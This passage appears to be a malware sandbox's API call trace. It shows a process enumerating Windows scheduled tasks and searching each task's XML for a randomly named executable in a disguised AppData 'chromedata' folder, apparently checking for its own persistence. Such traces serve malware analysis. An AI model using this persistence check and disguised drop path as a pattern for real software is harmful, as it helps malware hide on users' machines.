	[0073.520] ITaskFolderCollection:get_Item (in: This=0x55fd98, index=0x128e4c*(varType=0x3, wReserved1=0x0, wReserved2=0x1, wReserved3=0x0, varVal1=0x4, varVal2=0x76fa8cd5), ppFolder=0x128f6c | out: ppFolder=0x128f6c*=0x55fe58) returned 0x0
	[0073.520] ITaskFolder:GetTasks (in: This=0x55fe58, flags=1, ppTasks=0x128e40 | out: ppTasks=0x128e40*=0x55fec8) returned 0x0
	[0073.520] IRegisteredTaskCollection:get_Count (in: This=0x55fec8, pCount=0x128e30 | out: pCount=0x128e30*=1) returned 0x0
	[0073.520] IRegisteredTaskCollection:get_Item (in: This=0x55fec8, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfe58, wReserved3=0x55, varVal1=0x1, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x22c1048) returned 0x0
	[0073.520] IRegisteredTask:get_Name (in: This=0x22c1048, pName=0x128e3c | out: pName=0x128e3c*="Proxy") returned 0x0
	[0073.520] IRegisteredTask:get_Xml (in: This=0x22c1048, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Source>$(@%systemroot%\\system32\\acproxy.dll,-100)</Source>\r\n    <Author>$(@%systemroot%\\system32\\acproxy.dll,-101)</Author>\r\n    <Description>$(@%systemroot%\\system32\\acproxy.dll,-102)</Description>\r\n    <URI>Microsoft\\Windows\\Autochk\\Proxy</URI>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <BootTrigger id=\"AutochkProxy\">\r\n      <Delay>PT30M</Delay>\r\n      <Enabled>true</Enabled>\r\n    </BootTrigger>\r\n  </Triggers>\r\n  <Settings>\r\n    <IdleSettings>\r\n      <Duration>PT10M</Duration>\r\n      <WaitTimeout>PT31536000S</WaitTimeout>\r\n      <StopOnIdleEnd>false</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n    <Enabled>false</Enabled>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <RunOnlyIfIdle>true</RunOnlyIfIdle>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"LocalService\">\r\n      <UserId>S-1-5-19</UserId>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"LocalService\">\r\n    <Exec>\r\n      <Command>%windir%\\system32\\rundll32.exe</Command>\r\n      <Arguments>/d acproxy.dll,PerformAutochkOperations</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0073.522] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Source>$(@%systemroot%\\system32\\acproxy.dll,-100)</Source>\r\n    <Author>$(@%systemroot%\\system32\\acproxy.dll,-101)</Author>\r\n    <Description>$(@%systemroot%\\system32\\acproxy.dll,-102)</Description>\r\n    <URI>Microsoft\\Windows\\Autochk\\Proxy</URI>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <BootTrigger id=\"AutochkProxy\">\r\n      <Delay>PT30M</Delay>\r\n      <Enabled>true</Enabled>\r\n    </BootTrigger>\r\n  </Triggers>\r\n  <Settings>\r\n    <IdleSettings>\r\n      <Duration>PT10M</Duration>\r\n      <WaitTimeout>PT31536000S</WaitTimeout>\r\n      <StopOnIdleEnd>false</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n    <Enabled>false</Enabled>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <RunOnlyIfIdle>true</RunOnlyIfIdle>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"LocalService\">\r\n      <UserId>S-1-5-19</UserId>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"LocalService\">\r\n    <Exec>\r\n      <Command>%windir%\\system32\\rundll32.exe</Command>\r\n      <Arguments>/d acproxy.dll,PerformAutochkOperations</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0073.522] IUnknown:Release (This=0x22c1048) returned 0x0
	[0073.522] IUnknown:Release (This=0x55fec8) returned 0x0
	[0073.522] ITaskFolder:GetFolders (in: This=0x55fe58, flags=0, ppFolders=0x128e34 | out: ppFolders=0x128e34*=0x55fec8) returned 0x0
	[0073.522] ITaskFolderCollection:get_Count (in: This=0x55fec8, pCount=0x128e2c | out: pCount=0x128e2c*=0) returned 0x0
	[0073.522] IUnknown:Release (This=0x55fec8) returned 0x0
	[0073.522] TaskScheduler:IUnknown:Release (This=0x55fe58) returned 0x0
	[0073.522] ITaskFolderCollection:get_Item (in: This=0x55fd98, index=0x128e4c*(varType=0x3, wReserved1=0x0, wReserved2=0x1, wReserved3=0x0, varVal1=0x5, varVal2=0x76fa8cd5), ppFolder=0x128f6c | out: ppFolder=0x128f6c*=0x55fe58) returned 0x0
	[0073.522] ITaskFolder:GetTasks (in: This=0x55fe58, flags=1, ppTasks=0x128e40 | out: ppTasks=0x128e40*=0x55fed0) returned 0x0
	[0073.523] IRegisteredTaskCollection:get_Count (in: This=0x55fed0, pCount=0x128e30 | out: pCount=0x128e30*=1) returned 0x0
	[0073.523] IRegisteredTaskCollection:get_Item (in: This=0x55fed0, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfe58, wReserved3=0x55, varVal1=0x1, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x22c1048) returned 0x0
	[0073.523] IRegisteredTask:get_Name (in: This=0x22c1048, pName=0x128e3c | out: pName=0x128e3c*="UninstallDeviceTask") returned 0x0
	[0073.523] IRegisteredTask:get_Xml (in: This=0x22c1048, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Author>$(@%SystemRoot%\\system32\\BthUdTask.exe,-1002)</Author>\r\n    <Description>$(@%SystemRoot%\\system32\\BthUdTask.exe,-1001)</Description>\r\n    <SecurityDescriptor>D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;LS)</SecurityDescriptor>\r\n    <URI>Microsoft\\Windows\\Bluetooth\\UninstallDeviceTask</URI>\r\n  </RegistrationInfo>\r\n  <Principals>\r\n    <Principal id=\"LocalSystem\">\r\n      <UserId>S-1-5-18</UserId>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <Enabled>true</Enabled>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Actions Context=\"LocalSystem\">\r\n    <Exec>\r\n      <Command>BthUdTask.exe</Command>\r\n      <Arguments>$(Arg0)</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0073.524] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Author>$(@%SystemRoot%\\system32\\BthUdTask.exe,-1002)</Author>\r\n    <Description>$(@%SystemRoot%\\system32\\BthUdTask.exe,-1001)</Description>\r\n    <SecurityDescriptor>D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;LS)</SecurityDescriptor>\r\n    <URI>Microsoft\\Windows\\Bluetooth\\UninstallDeviceTask</URI>\r\n  </RegistrationInfo>\r\n  <Principals>\r\n    <Principal id=\"LocalSystem\">\r\n      <UserId>S-1-5-18</UserId>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <Enabled>true</Enabled>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Actions Context=\"LocalSystem\">\r\n    <Exec>\r\n      <Command>BthUdTask.exe</Command>\r\n      <Arguments>$(Arg0)</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0073.524] IUnknown:Release (This=0x22c1048) returned 0x0
	[0073.524] IUnknown:Release (This=0x55fed0) returned 0x0
	[0073.524] ITaskFolder:GetFolders (in: This=0x55fe58, flags=0, ppFolders=0x128e34 | out: ppFolders=0x128e34*=0x55fed0) returned 0x0
	[0073.525] ITaskFolderCollection:get_Count (in: This=0x55fed0, pCount=0x128e2c | out: pCount=0x128e2c*=0) returned 0x0
	[0073.525] IUnknown:Release (This=0x55fed0) returned 0x0
	[0073.525] TaskScheduler:IUnknown:Release (This=0x55fe58) returned 0x0
	[0073.525] ITaskFolderCollection:get_Item (in: This=0x55fd98, index=0x128e4c*(varType=0x3, wReserved1=0x0, wReserved2=0x1, wReserved3=0x0, varVal1=0x6, varVal2=0x76fa8cd5), ppFolder=0x128f6c | out: ppFolder=0x128f6c*=0x55fe58) returned 0x0
	[0073.525] ITaskFolder:GetTasks (in: This=0x55fe58, flags=1, ppTasks=0x128e40 | out: ppTasks=0x128e40*=0x55fef0) returned 0x0
	[0073.525] IRegisteredTaskCollection:get_Count (in: This=0x55fef0, pCount=0x128e30 | out: pCount=0x128e30*=3) returned 0x0
	[0073.525] IRegisteredTaskCollection:get_Item (in: This=0x55fef0, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfe58, wReserved3=0x55, varVal1=0x1, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x22c1060) returned 0x0
	[0073.525] IRegisteredTask:get_Name (in: This=0x22c1060, pName=0x128e3c | out: pName=0x128e3c*="SystemTask") returned 0x0
	[0073.525] IRegisteredTask:get_Xml (in: This=0x22c1060, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>\\Microsoft\\Windows\\CertificateServicesClient\\SystemTask</URI>\r\n    <Version>1.0</Version>\r\n    <SecurityDescriptor>D:P(A;;FA;;;BA)(A;;FA;;;SY)</SecurityDescriptor>\r\n    <Source>$(@%SystemRoot%\\system32\\dimsjob.dll,-100)</Source>\r\n    <Author>$(@%SystemRoot%\\system32\\dimsjob.dll,-101)</Author>\r\n    <Description>$(@%SystemRoot%\\system32\\dimsjob.dll,-102)</Description>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <EventTrigger id=\"5a33e62f-7fb9-41d8-bc94-4ac450677743\">\r\n      <Enabled>true</Enabled>\r\n      <Subscription>&lt;QueryList&gt;\r\n                &lt;Query Id=\"0\" Path=\"System\"&gt;\r\n                    &lt;Select Path=\"System\"&gt;\r\n                        *[System[Provider[@Name='Microsoft-Windows-GroupPolicy'] and EventID=1502]]\r\n                    &lt;/Select&gt;\r\n                &lt;/Query&gt;\r\n                &lt;/QueryList&gt;</Subscription>\r\n    </EventTrigger>\r\n    <RegistrationTrigger>\r\n      <Enabled>true</Enabled>\r\n    </RegistrationTrigger>\r\n    <BootTrigger>\r\n      <Delay>PT10S</Delay>\r\n      <Repetition>\r\n        <Interval>PT8H</Interval>\r\n      </Repetition>\r\n      <Enabled>true</Enabled>\r\n    </BootTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"LocalSystem\">\r\n      <UserId>S-1-5-18</UserId>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"LocalSystem\">\r\n    <ComHandler>\r\n      <ClassId>{58fb76b9-ac85-4e55-ac04-427593b1d060}</ClassId>\r\n      <Data><![CDATA[SYSTEM]]></Data>\r\n    </ComHandler>\r\n  </Actions>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <RunOnlyIfNetworkAvailable>true</RunOnlyIfNetworkAvailable>\r\n    <RestartOnFailure>\r\n      <Interval>PT1M</Interval>\r\n      <Count>5</Count>\r\n    </RestartOnFailure>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n</Task>") returned 0x0
	[0073.527] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>\\Microsoft\\Windows\\CertificateServicesClient\\SystemTask</URI>\r\n    <Version>1.0</Version>\r\n    <SecurityDescriptor>D:P(A;;FA;;;BA)(A;;FA;;;SY)</SecurityDescriptor>\r\n    <Source>$(@%SystemRoot%\\system32\\dimsjob.dll,-100)</Source>\r\n    <Author>$(@%SystemRoot%\\system32\\dimsjob.dll,-101)</Author>\r\n    <Description>$(@%SystemRoot%\\system32\\dimsjob.dll,-102)</Description>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <EventTrigger id=\"5a33e62f-7fb9-41d8-bc94-4ac450677743\">\r\n      <Enabled>true</Enabled>\r\n      <Subscription>&lt;QueryList&gt;\r\n                &lt;Query Id=\"0\" Path=\"System\"&gt;\r\n                    &lt;Select Path=\"System\"&gt;\r\n                        *[System[Provider[@Name='Microsoft-Windows-GroupPolicy'] and EventID=1502]]\r\n                    &lt;/Select&gt;\r\n                &lt;/Query&gt;\r\n                &lt;/QueryList&gt;</Subscription>\r\n    </EventTrigger>\r\n    <RegistrationTrigger>\r\n      <Enabled>true</Enabled>\r\n    </RegistrationTrigger>\r\n    <BootTrigger>\r\n      <Delay>PT10S</Delay>\r\n      <Repetition>\r\n        <Interval>PT8H</Interval>\r\n      </Repetition>\r\n      <Enabled>true</Enabled>\r\n    </BootTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"LocalSystem\">\r\n      <UserId>S-1-5-18</UserId>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"LocalSystem\">\r\n    <ComHandler>\r\n      <ClassId>{58fb76b9-ac85-4e55-ac04-427593b1d060}</ClassId>\r\n      <Data><![CDATA[SYSTEM]]></Data>\r\n    </ComHandler>\r\n  </Actions>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <RunOnlyIfNetworkAvailable>true</RunOnlyIfNetworkAvailable>\r\n    <RestartOnFailure>\r\n      <Interval>PT1M</Interval>\r\n      <Count>5</Count>\r\n    </RestartOnFailure>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0073.528] IUnknown:Release (This=0x22c1060) returned 0x0
	[0073.528] IRegisteredTaskCollection:get_Item (in: This=0x55fef0, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfe58, wReserved3=0x55, varVal1=0x2, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x22c1060) returned 0x0
	[0073.528] IRegisteredTask:get_Name (in: This=0x22c1060, pName=0x128e3c | out: pName=0x128e3c*="UserTask") returned 0x0
	[0073.528] IRegisteredTask:get_Xml (in: This=0x22c1060, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>\\Microsoft\\Windows\\CertificateServicesClient\\UserTask</URI>\r\n    <Version>1.0</Version>\r\n    <SecurityDescriptor>D:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;IU)</SecurityDescriptor>\r\n    <Source>$(@%SystemRoot%\\system32\\dimsjob.dll,-100)</Source>\r\n    <Author>$(@%SystemRoot%\\system32\\dimsjob.dll,-101)</Author>\r\n    <Description>$(@%SystemRoot%\\system32\\dimsjob.dll,-102)</Description>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <EventTrigger id=\"5a33e62f-7fb9-41d8-bc94-4ac450677743\">\r\n      <Enabled>true</Enabled>\r\n      <Subscription>&lt;QueryList&gt;&lt;Query Id=\"0\" Path=\"System\"&gt;&lt;Select Path=\"System\"&gt;*[System[Provider[@Name='Microsoft-Windows-GroupPolicy'] and EventID=1503]]&lt;/Select&gt;&lt;/Query&gt;&lt;/QueryList&gt;</Subscription>\r\n    </EventTrigger>\r\n    <RegistrationTrigger>\r\n      <Enabled>true</Enabled>\r\n    </RegistrationTrigger>\r\n    <LogonTrigger>\r\n      <Repetition>\r\n        <Interval>PT8H</Interval>\r\n      </Repetition>\r\n      <Enabled>true</Enabled>\r\n    </LogonTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"InteractiveUsers\">\r\n      <GroupId>S-1-5-4</GroupId>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"InteractiveUsers\">\r\n    <ComHandler>\r\n      <ClassId>{58fb76b9-ac85-4e55-ac04-427593b1d060}</ClassId>\r\n      <Data><![CDATA[USER]]></Data>\r\n    </ComHandler>\r\n  </Actions>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <RunOnlyIfNetworkAvailable>true</RunOnlyIfNetworkAvailable>\r\n    <RestartOnFailure>\r\n      <Interval>PT1M</Interval>\r\n      <Count>5</Count>\r\n    </RestartOnFailure>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n</Task>") returned 0x0
	[0073.529] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>\\Microsoft\\Windows\\CertificateServicesClient\\UserTask</URI>\r\n    <Version>1.0</Version>\r\n    <SecurityDescriptor>D:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;IU)</SecurityDescriptor>\r\n    <Source>$(@%SystemRoot%\\system32\\dimsjob.dll,-100)</Source>\r\n    <Author>$(@%SystemRoot%\\system32\\dimsjob.dll,-101)</Author>\r\n    <Description>$(@%SystemRoot%\\system32\\dimsjob.dll,-102)</Description>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <EventTrigger id=\"5a33e62f-7fb9-41d8-bc94-4ac450677743\">\r\n      <Enabled>true</Enabled>\r\n      <Subscription>&lt;QueryList&gt;&lt;Query Id=\"0\" Path=\"System\"&gt;&lt;Select Path=\"System\"&gt;*[System[Provider[@Name='Microsoft-Windows-GroupPolicy'] and EventID=1503]]&lt;/Select&gt;&lt;/Query&gt;&lt;/QueryList&gt;</Subscription>\r\n    </EventTrigger>\r\n    <RegistrationTrigger>\r\n      <Enabled>true</Enabled>\r\n    </RegistrationTrigger>\r\n    <LogonTrigger>\r\n      <Repetition>\r\n        <Interval>PT8H</Interval>\r\n      </Repetition>\r\n      <Enabled>true</Enabled>\r\n    </LogonTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"InteractiveUsers\">\r\n      <GroupId>S-1-5-4</GroupId>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"InteractiveUsers\">\r\n    <ComHandler>\r\n      <ClassId>{58fb76b9-ac85-4e55-ac04-427593b1d060}</ClassId>\r\n      <Data><![CDATA[USER]]></Data>\r\n    </ComHandler>\r\n  </Actions>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <RunOnlyIfNetworkAvailable>true</RunOnlyIfNetworkAvailable>\r\n    <RestartOnFailure>\r\n      <Interval>PT1M</Interval>\r\n      <Count>5</Count>\r\n    </RestartOnFailure>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0073.529] IUnknown:Release (This=0x22c1060) returned 0x0
	[0073.529] IRegisteredTaskCollection:get_Item (in: This=0x55fef0, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfe58, wReserved3=0x55, varVal1=0x3, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x22c1060) returned 0x0
	[0073.529] IRegisteredTask:get_Name (in: This=0x22c1060, pName=0x128e3c | out: pName=0x128e3c*="UserTask-Roam") returned 0x0
	[0073.529] IRegisteredTask:get_Xml (in: This=0x22c1060, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>\\Microsoft\\Windows\\CertificateServicesClient\\UserTask-Roam</URI>\r\n    <Version>1.0</Version>\r\n    <SecurityDescriptor>D:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFW;;;IU)</SecurityDescriptor>\r\n    <Source>$(@%SystemRoot%\\system32\\dimsjob.dll,-100)</Source>\r\n    <Author>$(@%SystemRoot%\\system32\\dimsjob.dll,-101)</Author>\r\n    <Description>$(@%SystemRoot%\\system32\\dimsjob.dll,-102)</Description>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <SessionStateChangeTrigger>\r\n      <StateChange>SessionLock</StateChange>\r\n    </SessionStateChangeTrigger>\r\n    <SessionStateChangeTrigger>\r\n      <StateChange>SessionUnlock</StateChange>\r\n    </SessionStateChangeTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"InteractiveUsers\">\r\n      <GroupId>S-1-5-4</GroupId>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"InteractiveUsers\">\r\n    <ComHandler>\r\n      <ClassId>{58fb76b9-ac85-4e55-ac04-427593b1d060}</ClassId>\r\n      <Data><![CDATA[KEYROAMING]]></Data>\r\n    </ComHandler>\r\n  </Actions>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <RunOnlyIfNetworkAvailable>true</RunOnlyIfNetworkAvailable>\r\n    <RestartOnFailure>\r\n      <Interval>PT1M</Interval>\r\n      <Count>5</Count>\r\n    </RestartOnFailure>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <Enabled>false</Enabled>\r\n  </Settings>\r\n</Task>") returned 0x0
	[0073.531] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>\\Microsoft\\Windows\\CertificateServicesClient\\UserTask-Roam</URI>\r\n    <Version>1.0</Version>\r\n    <SecurityDescriptor>D:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFW;;;IU)</SecurityDescriptor>\r\n    <Source>$(@%SystemRoot%\\system32\\dimsjob.dll,-100)</Source>\r\n    <Author>$(@%SystemRoot%\\system32\\dimsjob.dll,-101)</Author>\r\n    <Description>$(@%SystemRoot%\\system32\\dimsjob.dll,-102)</Description>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <SessionStateChangeTrigger>\r\n      <StateChange>SessionLock</StateChange>\r\n    </SessionStateChangeTrigger>\r\n    <SessionStateChangeTrigger>\r\n      <StateChange>SessionUnlock</StateChange>\r\n    </SessionStateChangeTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"InteractiveUsers\">\r\n      <GroupId>S-1-5-4</GroupId>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"InteractiveUsers\">\r\n    <ComHandler>\r\n      <ClassId>{58fb76b9-ac85-4e55-ac04-427593b1d060}</ClassId>\r\n      <Data><![CDATA[KEYROAMING]]></Data>\r\n    </ComHandler>\r\n  </Actions>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <RunOnlyIfNetworkAvailable>true</RunOnlyIfNetworkAvailable>\r\n    <RestartOnFailure>\r\n      <Interval>PT1M</Interval>\r\n      <Count>5</Count>\r\n    </RestartOnFailure>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <Enabled>false</Enabled>\r\n  </Settings>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0073.531] IUnknown:Release (This=0x22c1060) returned 0x0
	[0073.531] IUnknown:Release (This=0x55fef0) returned 0x0
	[0073.531] ITaskFolder:GetFolders (in: This=0x55fe58, flags=0, ppFolders=0x128e34 | out: ppFolders=0x128e34*=0x55fef0) returned 0x0
	[0073.531] ITaskFolderCollection:get_Count (in: This=0x55fef0, pCount=0x128e2c | out: pCount=0x128e2c*=0) returned 0x0
	[0073.531] IUnknown:Release (This=0x55fef0) returned 0x0
	[0073.531] TaskScheduler:IUnknown:Release (This=0x55fe58) returned 0x0
	[0073.531] ITaskFolderCollection:get_Item (in: This=0x55fd98, index=0x128e4c*(varType=0x3, wReserved1=0x0, wReserved2=0x1, wReserved3=0x0, varVal1=0x7, varVal2=0x76fa8cd5), ppFolder=0x128f6c | out: ppFolder=0x128f6c*=0x55fe58) returned 0x0
	[0073.531] ITaskFolder:GetTasks (in: This=0x55fe58, flags=1, ppTasks=0x128e40 | out: ppTasks=0x128e40*=0x55ff08) returned 0x0
	[0073.532] IRegisteredTaskCollection:get_Count (in: This=0x55ff08, pCount=0x128e30 | out: pCount=0x128e30*=3) returned 0x0
	[0073.532] IRegisteredTaskCollection:get_Item (in: This=0x55ff08, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfe58, wReserved3=0x55, varVal1=0x1, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x22c1048) returned 0x0
	[0073.532] IRegisteredTask:get_Name (in: This=0x22c1048, pName=0x128e3c | out: pName=0x128e3c*="Consolidator") returned 0x0
	[0073.532] IRegisteredTask:get_Xml (in: This=0x22c1048, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <SecurityDescriptor>D:(A;OICI;FA;;;BA)(A;OICI;FA;;;SY)(A;OICI;GRGX;;;AU)</SecurityDescriptor>\r\n    <URI>\\Microsoft\\Windows\\Customer Experience Improvement Program\\Consolidator</URI>\r\n    <Source>$(@%systemRoot%\\system32\\wsqmcons.exe,-106)</Source>\r\n    <Author>Microsoft Corporation</Author>\r\n    <Description>$(@%systemRoot%\\system32\\wsqmcons.exe,-107)</Description>\r\n    <Version>1.0</Version>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <TimeTrigger>\r\n      <StartBoundary>2004-01-02T00:00:00</StartBoundary>\r\n      <Repetition>\r\n        <Interval>PT19H</Interval>\r\n      </Repetition>\r\n    </TimeTrigger>\r\n  </Triggers>\r\n  <Settings>\r\n    <Enabled>false</Enabled>\r\n    